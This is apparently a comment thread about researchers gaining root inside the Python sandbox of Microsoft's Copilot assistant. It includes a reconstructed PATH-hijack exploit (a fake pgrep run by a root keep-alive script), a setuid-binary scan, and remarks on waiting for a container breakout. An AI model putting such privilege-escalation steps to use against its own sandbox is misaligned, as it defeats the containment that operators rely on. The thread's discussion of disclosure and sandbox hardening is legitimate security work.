It turned out not to really matter, because the container itself was still secured - you couldn't make network requests from it and you couldn't break out of it, so really all you could do with root was mess up a container that only you had access to anyway.
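For the curious, a sandbox locked down the way that comment describes might be launched roughly like this (a sketch, assuming Docker and a hypothetical image named "sandbox"; the real service presumably uses its own orchestration):

    import subprocess

    # Layered defense: no network, no capabilities, read-only filesystem,
    # unprivileged user. Even if you escalate inside, there is nowhere to go.
    subprocess.run([
        "docker", "run", "--rm",
        "--network=none",      # no outbound requests, as noted above
        "--cap-drop=ALL",      # no capabilities, even for root
        "--read-only",
        "--user", "1000:1000",
        "sandbox", "python", "-c", "print('untrusted code runs here')",
    ], check=True)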
Are there any known unfixed container breakouts at the moment in the kind of systems Microsoft are likely to be using here?
Sometimes the (completion randomly selected from the outputs of the) predictive text model goes "yes, and". Other times, it goes "no, because". As observed in the article, if it's autocompleting the result of many "yes, and"s, the story is probably going to have another "yes, and" next, but if a story starts off with a certain kind of demand, it's probably going to continue with a refusal.
I read "rooted copilot" and I think they got root on a vm that is core to copilot itself.
A much more accurate title would be "How We Rooted the Copilot Python Sandbox"
it’s a nothing burger, which actually goes to show just how effective sandboxing is for defense in depth.
An LLM is like an insane quadruple agent: you don't know whose side it is on (if any at all).
I'm saying this because I work there and I don't recognize any of those processes.
In fact I found one script named keepAliveJupyterSvc.sh in a public repo: https://github.com/shivamkm07/code-interpreter/blob/load-tes...
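If the write-up's description holds, the root shell came from a classic PATH hijack: that keep-alive script, running as root, called pgrep without an absolute path while a user-writable directory sat earlier in $PATH. A hypothetical reconstruction in Python (paths illustrative, not confirmed):

    import os

    WRITABLE_BIN = "/app/miniconda/bin"  # assumed user-writable and early in $PATH

    fake_pgrep = os.path.join(WRITABLE_BIN, "pgrep")
    with open(fake_pgrep, "w") as f:
        # Record who ran us, then hand off to the real pgrep so the
        # keep-alive loop keeps working and nothing looks broken.
        f.write('#!/bin/sh\nid > /tmp/proof.txt\nexec /usr/bin/pgrep "$@"\n')
    os.chmod(fake_pgrep, 0o755)

    # The next time the root-owned keep-alive script calls pgrep,
    # /tmp/proof.txt reads uid=0.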
Guys, chatbots are mostly token generators; they don't run programs and give you responses... it's not a simple shell program, it computes things on the GPU and returns tokens, which are then translated back into English.
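That's roughly this loop, in toy form (tokenizer and model here are placeholders, not any particular library's API):

    def generate(prompt: str, tokenizer, model, max_new_tokens: int = 50) -> str:
        tokens = tokenizer.encode(prompt)           # English -> tokens
        for _ in range(max_new_tokens):
            next_token = model.sample_next(tokens)  # runs on the GPU
            tokens.append(next_token)
        return tokenizer.decode(tokens)             # tokens -> English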
This is literally the same.
The safety in the system is that the code is executed in a container.
Sounds fake. LLMs don't usually memorize things that appear once in their training set anyway, nor have I heard about major issues accidentally training on a bunch of non-public data.
I can see how someone would believe it to be true though, since LLMs can easily hallucinate in a way that looks like this is true.
Using that information for trading is illegal, but so is exposing that information outside of approved channels.
Whatever the case, the only time people look at your social media history is to look for attacks, and the only reason they will look at a company's Slack messages and emails is to look for attacks during discovery.
I would argue that company secrets are mostly useless for the company but very, very useful to other companies. For this reason, there should be a retention policy of a day or two for almost all communication unless it is important, required by law, or documentation. And definitely do not share that information with the public without good reason.
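As a sketch of what that policy could look like in code (all names hypothetical):

    from datetime import datetime, timedelta, timezone

    RETENTION = timedelta(days=2)

    def prune(messages):
        cutoff = datetime.now(timezone.utc) - RETENTION
        # Keep anything recent, plus anything flagged as important,
        # required by law, or documentation.
        return [m for m in messages
                if m["sent_at"] >= cutoff or m.get("keep")]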
Startups are probably most vulnerable as they are likely to use more "pet" techniques for infra, like SSH open to any IP to make changes.
Of course it depends on what the secrets are. 99% will just be internal process drivel and interdepartmental bickering, but there's some really important stuff in there too.
Something like the top screenshot here, though:
https://www.zdnet.com/article/chatgpt-can-leak-source-data-v...
(not parent commenter but) tl;dr no
There was a boba tea company that had a free, no-sign-in required LLM that I used to generate a few bash scripts before ChatGPT free-tier started.
https://en.wikipedia.org/wiki/Setuid
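In short: a setuid-root binary runs with root's privileges no matter who executes it, which is why such binaries are the first stop when hunting for privilege escalation. A quick scan for them (a minimal sketch):

    import os
    import stat

    for bin_dir in ("/bin", "/usr/bin", "/usr/sbin"):
        if not os.path.isdir(bin_dir):
            continue
        for name in os.listdir(bin_dir):
            path = os.path.join(bin_dir, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            if st.st_mode & stat.S_ISUID and st.st_uid == 0:
                print(path)  # e.g. /usr/bin/sudo, /usr/bin/passwd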
> We reported the vulnerability to Microsoft in April and they have since fixed it as a moderate severity vulnerability. As only important and critical vulnerabilities qualify for a bounty award, we did not receive anything, except for an acknowledgement on the Security Researcher Acknowledgments for Microsoft Online Services webpage.
I guess it makes sense that a poor little indie company like Microsoft can't pay bug bounties. Surely no bad things will come out of this.

> Now what have we gained with root access to the container?
> Absolutely nothing!
> We can now use this access to explore parts of the container that were previously inaccessible to us. We explored the filesystem, but there were no files in /root, no interesting logging to find, and a container breakout looked out of the question as every possible known breakout had been patched.
I'm sure there are more ways to acquire root. If Microsoft pays out for one, they have to pay out for all, and it seems pretty silly to do that for something that's slightly unintended but not dangerous.

> a container breakout looked out of the question as every possible known breakout had been patched
This is the part that concerns me. It only encourages an attacker to sit on an exploit like this until a new container breakout is discovered.

System prompt going out of context window, maybe?
This is your regular reminder that in-LLM safeguards never work. At best they can be used to give prettier messages about hard security boundaries on tool calls.
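In other words, the boundary belongs in the tool-dispatch layer, where the model can't talk its way past it. A toy sketch (all names illustrative):

    ALLOWED_TOOLS = {
        "search": lambda q: f"results for {q!r}",
        "weather": lambda city: f"forecast for {city}",
    }

    def run_tool(name: str, arg: str) -> str:
        # Enforced in code: a tool outside the allowlist never runs, no
        # matter how the model was prompted or persuaded. The LLM's job is
        # at most to phrase the refusal nicely.
        tool = ALLOWED_TOOLS.get(name)
        if tool is None:
            return f"tool {name!r} is not permitted"
        return tool(arg)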
That time produced qmail and postfix. We are back to the early 1990s.